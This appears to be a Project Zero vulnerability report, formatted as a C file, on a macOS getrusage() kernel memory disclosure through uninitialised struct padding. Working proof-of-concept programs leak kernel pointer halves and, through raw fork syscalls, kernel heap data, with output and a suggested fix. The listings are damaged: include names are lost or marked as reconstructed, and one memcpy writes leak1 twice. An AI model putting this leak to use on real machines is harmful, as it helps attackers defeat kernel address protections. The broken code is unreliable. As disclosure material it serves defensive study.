/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405

For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a
`struct user64_rusage` using `munge_user64_rusage()`, then copies the
`struct user64_rusage` to userspace:

int
getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)
{
    struct rusage *rup, rubuf;
    struct user64_rusage rubuf64;
    struct user32_rusage rubuf32;
    size_t retsize = sizeof(rubuf); // default: 32 bits
    caddr_t retbuf = (caddr_t)&rubuf; // default: 32 bits
    struct timeval utime;
    struct timeval stime;

    switch (uap->who) {
    case RUSAGE_SELF:
        calcru(p, &utime, &stime, NULL);
        proc_lock(p);
        rup = &p->p_stats->p_ru;
        rup->ru_utime = utime;
        rup->ru_stime = stime;
        rubuf = *rup;
        proc_unlock(p);
        break;
    [...]
    }
    if (IS_64BIT_PROCESS(p)) {
        retsize = sizeof(rubuf64);
        retbuf = (caddr_t)&rubuf64;
        munge_user64_rusage(&rubuf, &rubuf64);
    } else {
        [...]
    }
    return (copyout(retbuf, uap->rusage, retsize));
}

`munge_user64_rusage()` performs the conversion by copying individual fields:

__private_extern__ void
munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)
{
    // timeval changes size, so utime and stime need special handling
    a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;
    a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;
    a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;
    a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;
    [...]
}

`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:

#define _STRUCT_USER64_TIMEVAL struct user64_timeval
_STRUCT_USER64_TIMEVAL
{
    user64_time_t tv_sec; // seconds
    __int32_t tv_usec; // and microseconds
};

struct user64_rusage {
    struct user64_timeval ru_utime; // user time used
    struct user64_timeval ru_stime; // system time used
    user64_long_t ru_maxrss; // max resident set size
    [...]
};

This padding is not initialized, but is copied to userspace.
The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.

Just leaking stack data from a previous syscall seems to mostly return the upper halves of
some kernel pointers. The returned data seems to come from the previous syscall:

$ cat test.c
#include <sys/resource.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
[note: this copy of the report lost the header names of its six #include lines; the five
above are reconstructed from the calls the listing makes, the sixth could not be recovered]

void do_leak(void) {
    static struct rusage ru;
    getrusage(RUSAGE_SELF, &ru);
    static unsigned int leak1, leak2;
    memcpy(&leak1, ((char*)&ru)+12, 4);
    memcpy(&leak1, ((char*)&ru)+28, 4);
    printf("leak1: 0x%08x\n", leak1);
    printf("leak2: 0x%08x\n", leak2);
}

int main(void) {
    do_leak();
    do_leak();
    do_leak();
    int fd = open("/dev/null", O_RDONLY);
    do_leak();
    int dummy;
    read(fd, &dummy, 4);
    do_leak();
    return 0;
}

$ gcc -o test test.c && ./test
leak1: 0x00000000
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff81
leak2: 0x00000000

However, I believe that this can also be used to disclose kernel heap memory. When the stack
freelists are empty, stack_alloc_internal() allocates a new kernel stack without zeroing it,
so the new stack contains data from previous heap allocations.
The following testcase, when run after repeatedly reading a wordlist into memory, leaks some non-pointer data that seems to come from the wordlist: $ cat forktest.c */ #include #include #include #include #include #include void do_leak(void) { static struct rusage ru; getrusage(RUSAGE_SELF, &ru); static unsigned int leak1, leak2; memcpy(&leak1, ((char*)&ru)+12, 4); memcpy(&leak2, ((char*)&ru)+28, 4); char str[1000]; if (leak1 != 0) { sprintf(str, "leak1: 0x%08x\n", leak1); write(1, str, strlen(str)); } if (leak2 != 0) { sprintf(str, "leak2: 0x%08x\n", leak2); write(1, str, strlen(str)); } } void leak_in_child(void) { int res_pid, res2; asm volatile( "mov $0x02000002, %%rax\n\t" "syscall\n\t" : "=a"(res_pid), "=d"(res2) : : "cc", "memory", "rcx", "r11" ); //write(1, "postfork\n", 9); if (res2 == 1) { //write(1, "child\n", 6); do_leak(); char dummy; read(0, &dummy, 1); asm volatile( "mov $0x02000001, %rax\n\t" "mov $0, %rdi\n\t" "syscall\n\t" ); } //printf("fork=%d:%d\n", res_pid, res2); int wait_res; //wait(&wait_res); } int main(void) { for(int i=0; i<1000; i++) { leak_in_child(); } } /* $ gcc -o forktest forktest.c && ./forktest leak1: 0x1b3b1320 leak1: 0x00007f00 leak1: 0x65686375 leak1: 0x410a2d63 leak1: 0x8162ced5 leak1: 0x65736168 leak1: 0x0000042b The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist. Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack. */